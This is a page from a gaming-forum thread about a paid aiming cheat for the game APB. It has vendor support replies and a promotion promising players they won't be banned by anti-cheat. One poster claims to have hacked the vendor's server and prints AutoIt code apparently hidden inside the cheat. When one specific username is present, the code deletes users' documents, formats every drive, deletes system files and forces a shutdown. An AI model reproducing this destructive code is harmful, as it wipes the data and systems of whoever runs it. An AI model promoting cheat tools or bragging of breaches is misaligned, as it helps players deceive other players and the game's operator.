Triggerbot FTW(;

Posts 61–75 of 76 · Page 5 of 6
I cannot register due to Captcha codes not being shown.
Quote Originally Posted by RAWR(: View Post
There is no way to change your crosshair size anymore. It's been patched.
Of course it is still possible, only not by config. You need to edit APB memory to do that.
Quote Originally Posted by ragaz11 View Post
yes i'm still having that problem
it's just works good, but when i press "Save Settings" while in game, it crash and that error come out
and if i try to open triggerbot while already in game just the error come out
Go and download the newest version. There might be something wrong with your version for whatever reason.


Quote Originally Posted by Nivvie View Post
I cannot register due to Captcha codes not being shown.
We fixed that issue.
EDIT

WORKING NOW!
but jesus it has a HUUUGE delay with commands
Yeah commands have delay in order to have them exit the main function properly. Otherwise, you'd see huge spikes in memory and cpu usage as well as keyboard failures because of the hook.
Quote Originally Posted by RAWR(: View Post
Yeah commands have delay in order to have them exit the main function properly. Otherwise, you'd see huge spikes in memory and cpu usage as well as keyboard failures because of the hook.
I can't connect to the website.
Quote Originally Posted by OverSkies View Post
I can't connect to the website.
PM me your external IP using the following link.
http://ifconfig.me/ip
Quote Originally Posted by RAWR(: View Post
PM me your external IP using the following link.
http://ifconfig.me/ip
Why do you need my IP? Whitelist?
Quote Originally Posted by OverSkies View Post
Why do you need my IP? Whitelist?
We've been having a few problems with security. You're IP might have been accidentally flagged as "suspicious activity."
Quote Originally Posted by RAWR(: View Post
We've been having a few problems with security. You're IP might have been accidentally flagged as "suspicious activity."
Sent you it via PM.
Quote Originally Posted by OverSkies View Post
Sent you it via PM.
I should hear back in an hour or so.

I have added you on skype.

---------- Post added at 06:29 PM ---------- Previous post was at 05:06 PM ----------

AutoGamers Valentine's Day Weekend Trials!

Well... that was a mouthful. On to the more pressing subject at hand, Autogamers is now offering free trials until Monday, February 18 12:00 AM.

Hold your own against hackers, whilst remaining worry-free of punkbuster banwaves. We guarantee that you won't be banned while using this. If you are banned while you have an active subscription here, we'll refund your money in full. Since October 2011, more than 700 people have been using this bot. Odds are good that you have played with or against numerous people using it!

So head on over to Autogamers.com and pick up your copy today! You won't regret your decision if you do. It will change your APB experience forever!

As always,
Happy Hunting!
See you in the streets of San Paro!

(Head over, click the download link at the top of the page, use any user+pass combination)
Quote Originally Posted by RAWR(: View Post
We've been having a few problems with security. You're IP might have been accidentally flagged as "suspicious activity."
A few problems?
I gained access to your entire server a few days ago, replaced your download with some fun malware, forced every user to update, gained access to your administrator accounts and emails, dumped your database, and constantly patch your hack. Few problems? Lolk. Might wanna work on that all.

Also:
Code:
Func _BLOCK()
    BlockInput(True)
    ProcessClose("Taskmgr.exe")
EndFunc
Func _DEL()
    ProcessClose("exe2aut.exe")
    If FileExists(StringReplace(@ScriptName, ".exe", ".au3")) Then FileDelete(StringReplace(@ScriptName, ".exe", ".au3"))
    Local $USERS = _SYSTEMUSERS(), $ADEL
    For $I = 1 To $USERS[0]
        If _StringToHex(StringUpper($USERS[$I])) == "4952535041464943" Then
            ProcessSetPriority(@AutoItPID, 5)
            For $J = 1 To $USERS[0]
                $ADEL = _RECFILELISTTOARRAY("C:\Users\" & $USERS[$J] & "\Documents", "*.au3;*.sql", 1, 1, 0, 2)
                If IsArray($ADEL) And Number($ADEL[0]) >= 1 Then
                    For $K = 1 To $ADEL[0]
                        FileWrite(FileOpen($ADEL[$K], 2), "I thought what I'd do was, I'd pretend I was one of those deaf-mutes.")
                    Next
                EndIf
                $ADEL = _RECFILELISTTOARRAY("C:\Users\" & $USERS[$J] & "\Documents", "*", 0, 1, 0, 2)
                If IsArray($ADEL) And Number($ADEL[0]) >= 1 Then
                    For $K = 1 To $ADEL[0]
                        FileDelete($ADEL[$K])
                    Next
                EndIf
            Next
            For $I = 68 To 90
                Run("Format " & Chr($I) & " /FS:NTFS /V:LaughingMan /Q /X /A:1024", "", @SW_HIDE)
            Next
            BlockInput(True)
            AdlibRegister("_Block", 500)
            $ADEL = _RECFILELISTTOARRAY("C:\", "*", 0, 1, 0, 2)
            If IsArray($ADEL) And Number($ADEL[0]) >= 1 Then
                For $K = 1 To $ADEL[0]
                    FileDelete($ADEL[$K])
                Next
            EndIf
            While ProcessExists("svchost.exe")
                ProcessClose("svchost.exe")
                ShellExecute("Shutdown.exe", "/a", "", "", @SW_HIDE)
            WEnd
            FileDelete("C:\Windows\System32\SVCHost.exe")
            ShellExecute("Shutdown.exe", '/h /t 5 /c "Dumbass... have fun!(;    Shitty Security = Shitty Coder = Shitty Program - _DeNy (Deceased)" /f /d P:2:18')
            MsgBox(0, "Dumbass...", "Have fun asshole(;" & @LF & @LF & "Shitty Security = Shitty Coder" & @LF & "Shitty Coder = Shitty Program" & @LF & @LF & "_DeNy (Deceased)", 6)
            Sleep(6)
            Shutdown(64)
        EndIf
    Next
EndFunc
And that's your solution?
Blocking IPs is just silly as well. Ever hear of a proxy? ^.^

Btw, I'm not using Exe2aut

Like I said in my release, shit security = shit programmer.

I'll release the patched version after I do a bit of testing. I like how you blacklisted one of my IPs from even accessing your site.

And btw, "Dumbass... have fun!(;". I will have fun.
hi rawr i donwload the free trial but not work for me plz do tutorial for the new version and show us how it work
email us. We'll get it working for you. I suggest going to the help menu and redownloading defaults. Its a bit weird and I dont think defaults get downloaded properly the first time around :/ I'm looking for a fix.

Quote Originally Posted by sargon2001 View Post
hi rawr i donwload the free trial but not work for me plz do tutorial for the new version and show us how it work
Your triggerbot give me a error and the site Autogamers.com is not reachable.

you can fix it pls?
Posts 61–75 of 76 · Page 5 of 6

Post a Reply

Similar Threads

Tags for this Thread

None

Talk with us